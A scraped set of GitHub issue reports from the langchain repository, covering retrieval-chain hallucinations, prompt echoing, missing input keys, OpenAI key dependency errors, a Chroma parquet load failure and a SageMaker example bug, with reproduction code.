_No response_ | DOC: DOCUMENT interface in Javascript but not in Python | https://api.github.com/repos/langchain-ai/langchain/issues/7215/comments | 2 | 2023-07-05T18:15:21Z | 2023-07-05T18:41:14Z | https://github.com/langchain-ai/langchain/issues/7215 | 1,790,052,100 | 7,215 |
[
"langchain-ai",
"langchain"
] | ### System Info
There seem to be some hallucinations involving the president and Michael Jackson.
I use the following, where `data` is loaded using `UnstructuredURLLoader(urls).load()` and `urls` is just a list of URLs I'm interested in. Needless to say, none of the URLs involve Michael Jackson (or the president, for that matter).
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [X] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
chain = RetrievalQAWithSourcesChain.from_chain_type(
llm= HuggingFaceHub(
repo_id="tiiuae/falcon-7b-instruct",
model_kwargs={"max_new_tokens": 500}
),
chain_type="map_reduce",
retriever=FAISS.from_documents(doc_splitter.split_documents(data),
HuggingFaceEmbeddings()).as_retriever()
)
```
followed by
```
prompt = "some text unrelated to Michael Jackson."
chain({"question": prompt}, return_only_outputs=True)
```
I believe this occurs as part of the `map_reduce.py` file:
```
result, extra_return_dict = self.reduce_documents_chain.combine_docs(
result_docs, callbacks=callbacks, **kwargs
)
```
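For intuition, a map-reduce chain has roughly this shape (illustrative Python pseudocode, not the real langchain implementation). Hallucinations like the Michael Jackson answer typically enter at the reduce step, where the model is asked to combine per-chunk answers even when none of them were relevant:

```python
def map_reduce_qa(question, docs, llm):
    """Rough shape of a map-reduce QA chain (illustrative sketch, not the
    real langchain implementation)."""
    # map step: answer the question against each retrieved chunk independently
    partials = [llm(f"Context: {d}\nQuestion: {question}") for d in docs]
    # reduce step: combine the partial answers into one final answer; if every
    # partial is irrelevant, a weak model may still fabricate something here
    return llm("Combine these partial answers:\n" + "\n".join(partials))

# demo with a fake LLM that just tags its input
answer = map_reduce_qa("what is X?", ["chunk one", "chunk two"],
                       lambda p: f"LLM({len(p)} chars)")
```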
### Expected behavior
should have provided some answer w.r.t to the provided data, stored in FAISS vectorbase | Undesired outputs when using map_reduce | https://api.github.com/repos/langchain-ai/langchain/issues/7199/comments | 2 | 2023-07-05T13:55:41Z | 2023-07-08T17:20:32Z | https://github.com/langchain-ai/langchain/issues/7199 | 1,789,623,893 | 7,199 |
[
"langchain-ai",
"langchain"
] | ### System Info
**Python : Python 3.9.13
Langchain: langchain==0.0.219
OS : Ubuntu**
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
from langchain.chains import ConversationalRetrievalChain
from langchain.vectorstores import Chroma
from langchain.embeddings import SentenceTransformerEmbeddings
embeddings = SentenceTransformerEmbeddings(model_name="paraphrase-MiniLM-L6-v2")
from langchain.document_loaders import PyPDFLoader
loader = PyPDFLoader("file.pdf")
documents = loader.load()
from langchain.llms import HuggingFaceHub
model = HuggingFaceHub(repo_id="facebook/mbart-large-50",
model_kwargs={"temperature": 0, "max_length":200},
huggingfacehub_api_token=HUGGING_FACE_API_KEY)
from langchain.text_splitter import CharacterTextSplitter
text_splitter = CharacterTextSplitter(chunk_size=100, chunk_overlap=0)
texts=text_splitter.split_documents(documents)
db = Chroma.from_documents(texts, embeddings)
retriever = db.as_retriever(search_type="similarity", search_kwargs={"k": 1})
qa = ConversationalRetrievalChain.from_llm(model,retriever)
chat_history= []
query = "sample query"
result = qa({"question": query,"chat_history":chat_history})
print("\nResult of ConversationalRetrievalChainMethod")
print(result)
```
It returns the **result** as follows:
{'question': 'sample question', 'chat_history': [], '**answer': "Use the following pieces of context to answer the question at the end. If you don't know the answer, just say that you don't know, don't try to make up an answer.**"}
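Note that the "answer" above is just the default QA prompt template echoed back, which suggests the model is repeating its input rather than answering (`facebook/mbart-large-50` is a translation model, so this is plausible). For context, the stuff chain assembles its prompt roughly like this (template paraphrased from the default of this era — exact wording may differ between versions):

```python
# Template paraphrased from the default stuff-chain QA prompt
# (an assumption -- exact wording may differ between versions).
DEFAULT_QA_TEMPLATE = (
    "Use the following pieces of context to answer the question at the end. "
    "If you don't know the answer, just say that you don't know, "
    "don't try to make up an answer.\n\n{context}\n\nQuestion: {question}\nHelpful Answer:"
)

def build_stuff_prompt(docs, question):
    # "stuff" = concatenate every retrieved chunk into one context block
    return DEFAULT_QA_TEMPLATE.format(context="\n\n".join(docs), question=question)

prompt = build_stuff_prompt(["chunk a", "chunk b"], "sample query")
```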
### Expected behavior
Expecting the answer in the result, but it returns the prompt itself.
[
"langchain-ai",
"langchain"
] | https://github.com/hwchase17/langchain/blob/e27ba9d92bd2cc4ac9ed7439becb2d32816fc89c/langchain/llms/huggingface_pipeline.py#L169
should be modified to
#response = self.pipeline(prompt)
response = self.pipeline(prompt, **kwargs) | kwargs are forgot to send to huggingface pipeline call | https://api.github.com/repos/langchain-ai/langchain/issues/7192/comments | 3 | 2023-07-05T11:18:41Z | 2023-12-19T00:50:02Z | https://github.com/langchain-ai/langchain/issues/7192 | 1,789,340,428 | 7,192 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
When using AgentType.OPENAI_FUNCTIONS, the error message "openai.error.InvalidRequestError: 'Gmail: Find Email' does not match '^[a-zA-Z0-9_-]{1,64}$' - 'functions.6.name'" suggests that the name you are using for the function ('Gmail: Find Email') does not adhere to the naming conventions.
For AgentType.OPENAI_FUNCTIONS, function names can only contain alphanumeric characters, underscores (_), and hyphens (-). The name must be between 1 and 64 characters long.
To resolve this issue, make sure the name you provide for the function complies with the naming rules mentioned above.
If you need further assistance, please provide more details about the specific function you're trying to use, and I'll be happy to help you further.
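A small sanitizer makes the constraint concrete (sketch; the regex is taken directly from the error message, and the helper name is illustrative):

```python
import re

# pattern copied from the error message
FUNCTION_NAME_RE = re.compile(r"^[a-zA-Z0-9_-]{1,64}$")

def sanitize_function_name(name: str) -> str:
    """Replace disallowed characters (spaces, colons, ...) with underscores and
    cap at 64 chars so a tool name like 'Gmail: Find Email' becomes valid."""
    return re.sub(r"[^a-zA-Z0-9_-]", "_", name)[:64] or "tool"
```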
### Suggestion:
_No response_ | Issue: <Please write a comprehensive title after the 'Issue: ' prefix> | https://api.github.com/repos/langchain-ai/langchain/issues/7191/comments | 3 | 2023-07-05T10:53:22Z | 2023-10-12T16:06:36Z | https://github.com/langchain-ai/langchain/issues/7191 | 1,789,300,649 | 7,191 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
I have written code to add memory to ConversationalRetrievalChain, but I am getting the error **"Missing some input keys: {'question'}"**. Below is a snippet of my code:
```
memory = ConversationBufferMemory(
    memory_key="chat_history",
    input_key="question"
)
chatTemplate = """
Answer the question based on the chat history(delimited by <hs></hs>) and context(delimited by <ctx> </ctx>) below.
-----------
<ctx>
{context}
</ctx>
-----------
<hs>
{chat_history}
</hs>
-----------
Question: {question}
Answer:
"""
promptHist = PromptTemplate(
    input_variables=["context", "question", "chat_history"],
    template=chatTemplate
)
retriever = chatDb.as_retriever(search_type="similarity", search_kwargs={"k": 2})
qa = ConversationalRetrievalChain.from_llm(
    llm=get_openai_model(), chain_type="stuff", retriever=retriever,
    return_source_documents=True,
    verbose=True,
    combine_docs_chain_kwargs={'prompt': promptHist},
    memory=memory,
)
result = qa({"query": prompt["prompt"]})
```
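For reference, the `Missing some input keys` error comes from a simple key check run before the chain executes. A rough sketch (assumed to mirror `Chain._validate_inputs`; the expected key name `question` is also an assumption worth verifying against `qa.input_keys`) shows why calling with a `query` key fails:

```python
def validate_inputs(inputs: dict, expected_keys: set) -> None:
    """Rough sketch of the pre-run key check (assumed to mirror
    Chain._validate_inputs)."""
    missing = set(expected_keys) - set(inputs)
    if missing:
        raise ValueError(f"Missing some input keys: {missing}")

# the chain's input key is "question" (assumption), so a "query" key is not enough
try:
    validate_inputs({"query": "sample"}, {"question"})
    failed = False
except ValueError:
    failed = True
```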
### Suggestion:
_No response_ | Issue: Missing some input keys: {'question'} when using ConversationalRetrievalChain | https://api.github.com/repos/langchain-ai/langchain/issues/7190/comments | 6 | 2023-07-05T10:50:07Z | 2024-03-04T14:32:18Z | https://github.com/langchain-ai/langchain/issues/7190 | 1,789,293,722 | 7,190 |
[
"langchain-ai",
"langchain"
] | ### System Info
I am trying to build a **VectorstoreIndexCreator** using the following configuration:
embeddings = **SentenceTransformerEmbeddings**
vectorstore_cls = **Chroma**
llm = **HuggingfaceHub** model
Note: I am not using any **openai** model for **llm** or **embedding** purposes.
Here is the code:
```
from langchain.indexes import VectorstoreIndexCreator
from langchain.vectorstores import Chroma
from langchain.text_splitter import CharacterTextSplitter
from langchain.embeddings import SentenceTransformerEmbeddings
from langchain.llms import HuggingFaceHub
from langchain.document_loaders import PyPDFLoader
loader = PyPDFLoader("pdffile.pdf")
embeddings = SentenceTransformerEmbeddings(model_name="paraphrase-MiniLM-L6-v2")
model = HuggingFaceHub(repo_id="facebook/mbart-large-50",
model_kwargs={"temperature": 0, "max_length":200},
huggingfacehub_api_token=HUGGING_FACE_API_KEY)
index = VectorstoreIndexCreator(
embeddings=embeddings,
vectorstore_cls=Chroma,
text_splitter=CharacterTextSplitter(chunk_size=100,chunk_overlap=0)
).from_loaders([loader])
result = index.query(llm=model,qustion=query,chain_type="refine")
```
But I am still getting the openai key dependency error when I run the code:
```
Did not find openai_api_key, please add an environment variable `OPENAI_API_KEY` which contains it, or pass `openai_api_key` as a named parameter. (type=value_error)
```
using langchain version: **langchain==0.0.219**
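One possible cause (an assumption worth checking against this version): the creator's field is named `embedding` — singular — and defaults to OpenAI embeddings, and pydantic v1 models ignore unknown keyword arguments by default, so a misspelled `embeddings=` may silently leave the OpenAI default in place. A minimal pure-Python sketch of that failure pattern (not the real class):

```python
class IndexCreatorSketch:
    """Illustrative stand-in, not the real VectorstoreIndexCreator."""
    def __init__(self, embedding=None, **ignored_extras):
        # unknown kwargs (e.g. a misspelled `embeddings=`) are silently dropped,
        # so the OpenAI-backed default stays active and demands an API key
        self.embedding = embedding if embedding is not None else "OpenAIEmbeddings()"

# the typo'd kwarg is ignored; the default (which needs OPENAI_API_KEY) survives
typoed = IndexCreatorSketch(embeddings="sentence-transformers")
correct = IndexCreatorSketch(embedding="sentence-transformers")
```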
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
from langchain.indexes import VectorstoreIndexCreator
from langchain.vectorstores import Chroma
from langchain.text_splitter import CharacterTextSplitter
from langchain.embeddings import SentenceTransformerEmbeddings
from langchain.llms import HuggingFaceHub
from langchain.document_loaders import PyPDFLoader
loader = PyPDFLoader("pdffile.pdf")
embeddings = SentenceTransformerEmbeddings(model_name="paraphrase-MiniLM-L6-v2")
model = HuggingFaceHub(repo_id="facebook/mbart-large-50",
model_kwargs={"temperature": 0, "max_length":200},
huggingfacehub_api_token=HUGGING_FACE_API_KEY)
index = VectorstoreIndexCreator(
embeddings=embeddings,
vectorstore_cls=Chroma,
text_splitter=CharacterTextSplitter(chunk_size=100,chunk_overlap=0)
).from_loaders([loader])
result = index.query(llm=model,qustion=query,chain_type="refine")
```
### Expected behavior
Dont show any openai error | Did not find openai_api_key, please add an environment variable `OPENAI_API_KEY` which contains it, or pass `openai_api_key` as a named parameter. (type=value_error) | https://api.github.com/repos/langchain-ai/langchain/issues/7189/comments | 11 | 2023-07-05T10:43:47Z | 2024-04-12T15:07:16Z | https://github.com/langchain-ai/langchain/issues/7189 | 1,789,283,892 | 7,189 |
[
"langchain-ai",
"langchain"
] | ### System Info
Python 3.11.4
duckdb==0.8.1
chromadb==0.3.26
langchain==0.0.221
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I persisted my Chroma database on an EC2 instance, where I have all these files:
chroma-collections.parquet
chroma-embeddings.parquet
index/
I downloaded these files to test the database on my local machine, but I got the error:
> Invalid Input Error: No magic bytes found at end of file 'database/vectors/chroma-embeddings.parquet'
When I tried to:
```
from langchain.vectorstores import Chroma
db = Chroma(embedding_function=embedding_function,
persist_directory=persist_directory,
collection_name=collection_name)
```
Can I download these persisted files and test them on another machine?
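In principle yes — the error usually points at a truncated or corrupted copy rather than a machine mismatch. Parquet files end with the 4-byte magic `PAR1`, which can be checked directly (illustrative helper; the synthetic files below merely stand in for `chroma-embeddings.parquet`):

```python
import os
import tempfile

def has_parquet_magic(path: str) -> bool:
    """Parquet files must end with the 4-byte magic b'PAR1'; a truncated
    transfer (e.g. an interrupted copy from EC2) fails this check."""
    if os.path.getsize(path) < 4:
        return False
    with open(path, "rb") as f:
        f.seek(-4, os.SEEK_END)
        return f.read(4) == b"PAR1"

def _write_tmp(data: bytes) -> str:
    tmp = tempfile.NamedTemporaryFile(suffix=".parquet", delete=False)
    tmp.write(data)
    tmp.close()
    return tmp.name

# synthetic stand-ins: one intact file, one truncated mid-transfer
intact_path, truncated_path = _write_tmp(b"cols...PAR1"), _write_tmp(b"cols...PAR")
intact, truncated = has_parquet_magic(intact_path), has_parquet_magic(truncated_path)
os.unlink(intact_path)
os.unlink(truncated_path)
```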
### Expected behavior
To read all the embeddings | Load Chroma database: Invalid Input Error: No magic bytes found at end of file 'database/vectors/chroma-embeddings.parquet' | https://api.github.com/repos/langchain-ai/langchain/issues/7188/comments | 2 | 2023-07-05T10:33:28Z | 2023-10-12T16:06:41Z | https://github.com/langchain-ai/langchain/issues/7188 | 1,789,266,410 | 7,188 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
https://python.langchain.com/docs/modules/model_io/models/llms/integrations/sagemaker
This example is not working. I just copy-pasted the code from here and ran it in my notebook instance. I'm using the falcon-40b-instruct model.
The error I'm getting is as follows:
Error raised by inference endpoint: An error occurred (ModelError) when calling the InvokeEndpoint operation: Received client error (422) from primary with message "Failed to deserialize the JSON body into the target type: missing field `inputs` at line 1 column 509".
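The 422 about a missing `inputs` field suggests the deployed container (likely text-generation-inference for falcon — an assumption) expects a JSON body of the form `{"inputs": ..., "parameters": ...}`. A sketch of the two transforms a custom content handler would need (function names here are illustrative, mirroring the `transform_input`/`transform_output` hooks):

```python
import json

def transform_input(prompt: str, model_kwargs: dict) -> bytes:
    # wrap the prompt in the "inputs" field the container complains about
    return json.dumps({"inputs": prompt, "parameters": model_kwargs}).encode("utf-8")

def transform_output(output_bytes: bytes) -> str:
    # TGI-style responses are a list of {"generated_text": ...} objects (assumption)
    response = json.loads(output_bytes.decode("utf-8"))
    return response[0]["generated_text"]

# demo round-trip
body = transform_input("What is the meaning of life?", {"max_new_tokens": 16})
decoded = json.loads(body.decode("utf-8"))
generated = transform_output(b'[{"generated_text": "42"}]')
```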
### Idea or request for content:
_No response_ | DOC: https://python.langchain.com/docs/modules/model_io/models/llms/integrations/sagemaker | https://api.github.com/repos/langchain-ai/langchain/issues/7187/comments | 4 | 2023-07-05T10:10:48Z | 2024-02-10T16:22:12Z | https://github.com/langchain-ai/langchain/issues/7187 | 1,789,229,545 | 7,187 |